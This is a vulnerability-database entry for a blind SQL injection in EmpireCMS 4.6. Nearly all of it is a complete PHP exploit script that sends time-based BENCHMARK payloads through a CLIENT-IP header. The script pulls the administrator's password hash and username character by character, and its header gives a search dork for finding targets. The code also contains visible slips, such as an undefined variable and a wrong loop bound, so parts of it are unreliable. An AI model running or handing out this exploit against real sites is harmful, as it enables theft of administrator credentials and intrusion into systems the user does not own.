EmpireCMS Version 4.6 (/e/tool/gfen/index.php) Blind SQL Injection Exploit

基本字段

漏洞编号：: SSV-7315

披露/发现时间：: 未知

提交时间：: 2007-09-25

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: EmpireCMS

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 1.25KB

<?php /* EmpireCMS Version 4.6 (/e/tool/gfen/index.php) Blind SQL Injection Exploit fuck php>=5(鸡肋漏洞，还要在系统开启会员宣传积分功能时才有效) author...: Flyh4t mail.....: flyh4t@126.com link.....: http://hi.baidu.com/flyhat dork.....: "Powered by EmpireCMS" */ error_reporting(0); ini_set("default_socket_timeout",5); set_time_limit(0); function http_send($host, $packet) { $i = 0; $sock = fsockopen($host, 80); while (!$sock) { if ($i++ == 10) die(); print "\n[-] No response from ".$host.":80 Trying again...\n"; $sock = fsockopen($host,$port); sleep(1); } fputs($sock, $packet); $resp = ""; while (!feof($sock)) $resp .= fread($sock, 1); fclose($sock); return $resp; } function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } function getdelay($query) { global $host, $path; $pck = "GET ".$path."/e/tool/gfen/index.php?id=1 HTTP/1.1\r\n"; $pck .= "Accept: */*\r\n"; $pck .= "Accept-Language: zh-cn\r\n"; $pck .= "Accept-Encoding: gzip, deflate\r\n"; $pck .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)\r\n"; $pck .= "CLIENT-IP: $sql\r\n"; $pck.= "Host: ".$host."\r\n"; $pck.= "Keep-Alive: 300\r\n"; $pck.= "Connection: keep-alive\r\n\r\n"; $start = getmicrotime()*1000; http_send($host, $pck); $end = getmicrotime()*1000; return ($end - $start); } function normaldelay() { global $count, $prefix, $uid; $sql = "127.0.0.1' union SELECT/**/username/**/FROM/**/".$prefix."_enewsuser/**/WHERE/**/userid=".$uid."/**/AND/**/RAND(IF(1=0,BENCHMARK(".$count.",MD5(1)),0))/*"; $d1 = getdelay($sql); $d2 = getdelay($sql); $d3 = getdelay($sql); $m = ($d1 + $d2 + $d3) / 3; return (intval($m)); } function benchmarkdelay() { global $count, $prefix, $uid; $sql = "1' union SELECT/**/username/**/FROM/**/".$prefix."_enewsuser/**/WHERE/**/userid=".$uid."/**/AND/**/RAND(IF(1=0,BENCHMARK(".$count.",MD5(1)),0))/*"; $d1 = getdelay($sql); $d2 = getdelay($sql); $d3 = getdelay($sql); $m = ($d1 + $d2 + $d3) / 3; return (intval($m)); } function check_query($query) { global $ndelay; $ret = false; $d = intval(getdelay($query)); if ($d > ($ndelay * 2)) $ret = true; return $ret; } function check_target() { global $host, $path; print "\n[-] Checking $host..."; $pck = "GET ".$path."/e/tool/gfen/index.php?id=1 HTTP/1.1\r\n"; $pck .= "Accept: */*\r\n"; $pck .= "Accept-Language: zh-cn\r\n"; $pck .= "Accept-Encoding: gzip, deflate\r\n"; $pck .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)\r\n"; $pck .= "CLIENT-IP: 127.0.0.1' union select 1/*\r\n"; $pck.= "Host: ".$host."\r\n"; $pck.= "Keep-Alive: 300\r\n"; $pck.= "Connection: keep-alive\r\n\r\n"; $buff = http_send($host, $pck); if (!strpos($buff, "Location")) die("\n\n[-] Error... Probably wrong MySQL version!\n"); else print " OK!\n"; } print "\n+-----------------------------------------------------------------------------+"; print "\n| EmpireCMS Version 4.6 (/e/tool/gfen/index.php) Blind SQL Injection Exploit |"; print "\n| by flyh4t[cnsst.org] |"; print "\n| thx EgiX |"; print "\n+-----------------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage: php $argv[0] host path [delay] [prefix] [userid]\n"; print "\nhost: target server (ip/hostname)"; print "\npath: path to ecms directory"; print "\ndelay: delay for BENCHMARK() (dafault: 1000000)"; print "\nprefix: table's prefix (default: phome)"; print "\nuserid: user id (default: 1 - admin)\n"; die(); } $host = $argv[1]; $path = $argv[2]; $count = (isset($argv[3]) ? $argv[3] : 1000000); $prefix = (isset($argv[4]) ? $argv[4] : "phome"); $uid = (isset($argv[5]) ? $argv[5] : "1"); check_target(); print "\n[-] Testing delay time..."; $ndelay = normaldelay(); print "\n[-] Normal delay: $ndelay ms"; $bdelay = benchmarkdelay(); print "\n[-] Benchmark delay: $bdelay ms\n"; $hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); $index = 1; $md5 = ""; print "\n[-] MD5 Hash: "; while (!strpos($md5, chr(0))) { for ($i = 0; $i <= count($hash); $i++) { if ($i == count($hash)) die("\n[-] Exploit failed...\n"); $sql = "127.0.0.1' union SELECT/**/password/**/FROM/**/".$prefix."_users/**/WHERE/**/userid=".$uid."/**/OR/**/" . "RAND(IF((ORD(SUBSTRING(password,".$index.",1))=".$hash[$i]."),BENCHMARK(".$count.",MD5(1)),1))/*"; if (check_query($sql)) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break; } } $index++; } $char = array(0); // null char for ($j = 97; $j <= 122; $j++) $char = array_merge($char, array($j)); // a-z for ($j = 65; $j <= 90; $j++) $char = array_merge($char, array($j)); // A-Z for ($j = 48; $j <= 57; $j++) $char = array_merge($char, array($j)); // 0-9 $index = 1; $user = ""; print "\n[-] Username: "; while (!strpos($user, chr(0))) { for ($i = 0; $i <= count($hash); $i++) { if ($i == count($hash)) die("\n[-] Exploit failed...\n"); $sql = "127.0.0.1' union SELECT/**/username/**/FROM/**/".$prefix."_users/**/WHERE/**/userid=".$uid."/**/OR/**/" . "RAND(IF((ORD(SUBSTRING(username,".$index.",1))=".$char[$i]."),BENCHMARK(".$count.",MD5(1)),1))/*"; if (check_query($sql)) { $user .= chr($char[$i]); print chr($char[$i]); break; } } $index++; } print "\n\n[-] Successfull!\n"; ?>